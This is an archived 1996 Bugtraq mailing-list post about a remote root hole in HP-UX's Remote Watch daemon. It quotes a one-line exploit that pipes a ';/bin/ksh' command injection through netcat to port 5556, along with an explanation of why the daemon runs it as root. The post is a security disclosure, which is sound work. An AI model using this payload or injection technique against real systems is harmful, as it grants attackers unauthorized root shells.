Bugtraq mailing list archives
HP/UX Remote Watch (was Re: BoS: SOD remote exploit)
From: barnett () GRYMOIRE CRD GE COM (Bruce Barnett)
Date: Tue, 15 Oct 1996 09:51:10 -0400
There have been questions about this exploit: ========== #!/bin/ksh echo ' 11T ;/bin/ksh' | nc $1 5556 # Yup, that's it. That's the hole.. Believe it. ========== This was the first HP "hole of the week", found "courtesy of" http://command.com.inter.net/~sod in late September 1996. I found the following note along with the exploit: ========== The Explanation First, if you're not running with netcat, stop and go out and get it. You could do this with telnet, and netcat certainly isn't required for this at all, but it just kicks in general, IMHO. Now, basically what we're doing is sending a string to the rwdaemon port, which is usually # 5556. This could change, but I haven't seen anyone who's done it yet. The string has basically three parts, the ' 11' part, the T, and the ';/bin/ksh' part. The 11 represents the total string length as sent to the daemon (minus the first three bytes, of course), sent in ASCII numeric for some ungodly reason. The T signals a certain program, in this case, ummm, getparams, I think. Now from this point, we can only send a single argument to the daemon, because it will strip out whitespace-seperated arguments and only use the first one. The getparams program gets run under a shell, so all the shell metacharacters are valid. The shell gets sent the command 'getparams -somearg1 -somearg2 ;/bin/ksh -v' (the -v gets stuck as the last argument). It'll balk on the getparams, send the error, then drop you into a root shell.. How thoughtful of it.
Current thread:
- HP/UX Remote Watch (was Re: BoS: SOD remote exploit) Bruce Barnett (Oct 15)